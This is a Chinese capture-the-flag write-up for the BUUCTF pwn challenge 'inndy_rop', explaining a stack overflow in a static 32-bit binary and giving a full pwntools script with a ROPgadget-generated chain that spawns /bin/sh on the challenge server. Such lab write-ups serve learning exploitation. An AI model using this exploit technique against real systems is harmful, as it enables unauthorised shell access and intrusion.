inndy_rop

附件

步骤:

  1. 例行检查,32位,开启了nx保护
  2. 本地调试运行没看出个啥,直接上ida,一开始f5会报错,
  3. 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar

  4. 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可
  5. 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞
  6. 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的
    这边直接利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链。
ROPgadget --binary rop --ropchain


可以看到直接给我们找到了一个应该是写好了的利用exp,只要我们手动加个偏移造成溢出即可

from pwn import*

from struct import pack

r=remote('node3.buuoj.cn',26917)

def payload():

        p='a'*(0xc+4)

	p += pack('<I', 0x0806ecda) # pop edx ; ret

	p += pack('<I', 0x080ea060) # @ .data

	p += pack('<I', 0x080b8016) # pop eax ; ret

	p += '/bin'

	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret

	p += pack('<I', 0x0806ecda) # pop edx ; ret

	p += pack('<I', 0x080ea064) # @ .data + 4

	p += pack('<I', 0x080b8016) # pop eax ; ret

	p += '//sh'

	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret

	p += pack('<I', 0x0806ecda) # pop edx ; ret

	p += pack('<I', 0x080ea068) # @ .data + 8

	p += pack('<I', 0x080492d3) # xor eax, eax ; ret

	p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret

	p += pack('<I', 0x080481c9) # pop ebx ; ret

	p += pack('<I', 0x080ea060) # @ .data

	p += pack('<I', 0x080de769) # pop ecx ; ret

	p += pack('<I', 0x080ea068) # @ .data + 8

	p += pack('<I', 0x0806ecda) # pop edx ; ret

	p += pack('<I', 0x080ea068) # @ .data + 8

	p += pack('<I', 0x080492d3) # xor eax, eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0807a66f) # inc eax ; ret

	p += pack('<I', 0x0806c943) # int 0x80

        return p

shell = payload()

r.sendline(shell)

r.interactive()

[BUUCTF]PWN——inndy_rop的更多相关文章

  1. [BUUCTF]PWN——babyheap_0ctf_2017

    [BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...

  2. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. buuctf --pwn part2

    pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...

  6. buuctf pwn wp---part1

    pwn难啊 1.test_your_nc 测试你nc,不用说,连上就有. 2.rip ida中已经包含了system函数: 溢出,覆盖rip为fun函数,peda计算偏移为23: from pwn i ...

  7. [BUUCTF]PWN——pwnable_hacknote

    pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方 ...

  8. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  9. [BUUCTF]PWN——mrctf2020_easyoverflow

    mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shel ...

随机推荐

  1. Java数组声明

    初始赋值值:例:一个二维数组,有二个1维数组组成,每一个一维数组有3个元素int[][] a = { {1,2,3}, {4,5,6} } ;动态二维数组声明:例:一个二维数组,有二个1维数组组成,每 ...

  2. javascript-初级-day08

    return <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" ...

  3. 你有没有觉得邮件发送人固定配置在yml文件中是不妥当的呢?SpringBoot 动态设置邮件发送人

    明月当天,不知道你有没有思念的人 前言 之前其实已经写过SpringBoot异步发送邮件,但是今天在一个小项目中要用到发送邮件时,我突然觉得邮件发送人只有一个,并且固定写在yml文件中,就是非常的不妥 ...

  4. 为什么前端H5工程师工资那么高?

    目前,企业对于html5前端开发人才需求量非常大,小到企业网站.个人主页,大到政府部门,都是通过网站向外界展示形象.传播信息,网站离不开HTML5前端开发人员,所以学习html5前端开发在当前社会非常 ...

  5. 手写Bitset优化

    一种优化方法,具体例子可以看这里 这里只是存一下手写Bitset的板子 struct Bitset { unsigned a[1600]; void reset() { memset(a,0,size ...

  6. azkaban执行任务长时间无法结束

    问题显示: 由于一次执行较多的任务,导致azkaban的web程序崩溃,此时,关闭azkaban服务,重新启动azkaban 但是由于azkaban的exec程序无法关闭,这里采用kill的方式关掉e ...

  7. [linux] rm -rf删除软链接无权限?

    一个很简单的命令,使用频率非常高,但一没注意就会失策. 我将别人盘下的list目录软连接到自己盘中,想要删除时: rm -rf list/ #输入时自然地用tab键补全 结果: 试了多次也删除不了,最 ...

  8. Thinkphp5.1自动加载机制

    Thinkphp5.1自动加载机制 自动加载机制 注册自动加载 引入静态自动加载映射文件,autoload_static.php 根据首字母前缀将不同的加载类归类-$prefixLengthsPsr4 ...

  9. Excel-判断一个文本字符串中是否包含数字! 判断一个文本字符串是否是纯汉字!

    0.判断一个文本字符串中是否包含数字!/判断一个文本字符串是否是纯汉字! 公式=IF(LENB(A1)=2*LEN(A1),"都是汉字","含有非汉字字符") ...

  10. Excel-姓名列中同一个人汇总金额列,得出总金额

    8.姓名列中同一个人求和金额列,得出总金额. 方法一: P2处公式=SUMPRODUCT(($M$2:$M$20=$M2)*($N$2:$N$20)) 解释函数: 引用:https://zhinan. ...